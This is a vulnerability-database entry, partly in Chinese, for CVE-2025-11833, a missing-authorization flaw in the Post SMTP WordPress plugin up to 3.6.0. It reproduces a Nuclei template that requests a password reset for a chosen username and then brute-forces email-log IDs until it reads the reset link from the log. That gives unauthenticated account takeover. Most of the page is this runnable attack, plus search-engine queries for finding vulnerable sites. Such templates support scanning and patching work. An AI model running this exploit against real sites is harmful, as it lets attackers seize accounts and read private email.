CVE-2025-11833: Post SMTP <= 3.6.0 - Email Log Disclosure

日期: 2025-12-02 | 影响软件: Post SMTP | POC: 已公开

漏洞描述

Post SMTP WordPress plugin <= 3.6.0 contains an unauthorized data access vulnerability caused by missing capability check in __construct function, letting unauthenticated attackers read arbitrary logged emails, exploit requires no authentication.

PoC代码[已公开]

id: CVE-2025-11833

info:
  name: Post SMTP <= 3.6.0 - Email Log Disclosure
  author: Kazgangap
  severity: critical
  description: |
    Post SMTP WordPress plugin <= 3.6.0 contains an unauthorized data access vulnerability caused by missing capability check in __construct function, letting unauthenticated attackers read arbitrary logged emails, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can read sensitive logged emails, including password reset links, potentially leading to account takeover.
  remediation: |
    Update to the latest version beyond 3.6.0
  reference:
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-11833.md
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/post-smtp/post-smtp-complete-smtp-solution-with-logs-alerts-backup-smtp-mobile-app-360-missing-authorization-to-account-takeover-via-unauthenticated-email-log-disclosure
    - https://nvd.nist.gov/vuln/detail/CVE-2025-11833
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-11833
    epss-score: 0.17635
    epss-percentile: 0.94858
    cwe-id: CWE-862
    cpe: cpe:2.3:a:wpexperts:post_smtp_mailer:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wpexperts
    product: post_smtp_mailer
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/post-smtp
    fofa-query: body=/wp-content/plugins/post-smtp
  tags: cve,cve2025,wp,wp-plugin,wordpress,post-smtp,exposure,vkev,fuzz

variables:
  username: "{{username}}"

http:
  - raw:
      - |
        POST /wp-login.php?action=lostpassword&page=postman_email_log&view=log&log_id={{log_id}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        user_login={{username}}&redirect_to=&wp-submit=Get+New+Password

    payloads:
      log_id: helpers/wordlists/numbers.txt

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "your password, visit the following address:", "key=", "Username: {{username}}")'
        condition: and
# digest: 4a0a0047304502200d3178dec9395b4e0afb29c8b7fd39e5a90e5cec1ca42d8ae337a86725014b1e02210093e59f844daa5a65a9716dcfe24afd1ea4372f3a3258ee5563c39c3618987fcb:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-11833.yaml

相关漏洞推荐